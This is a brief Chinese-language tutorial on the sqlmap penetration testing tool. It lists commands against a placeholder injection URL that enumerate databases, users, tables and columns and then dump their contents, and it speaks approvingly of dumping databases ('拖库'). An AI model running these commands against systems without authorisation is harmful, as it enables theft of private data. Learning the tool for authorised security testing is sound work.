SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。
#> ./sqlmap.py -u “注入地址” -v 1 --dbs // 列举数据库
#> ./sqlmap.py -u “注入地址” -v 1 --current-db // 当前数据库
#>./sqlmap.py -u “注入地址” -v 1 --users // 列数据库用户
#> ./sqlmap.py -u “注入地址” -v 1 --current-user // 当前用户
#> ./sqlmap.py -u “注入地址” -v 1 --tables -D “数据库” // 列举数据库的表名
#> ./sqlmap.py -u “注入地址” -v 1 --columns -T “表名” -D “数据库” // 获取表的列名
#>./sqlmap.py -u “注入地址” -v 1 --dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据,包含列
已经开始拖库了,SQLMAP是非常人性化的,它会将获取的数据存储sqlmap/output/中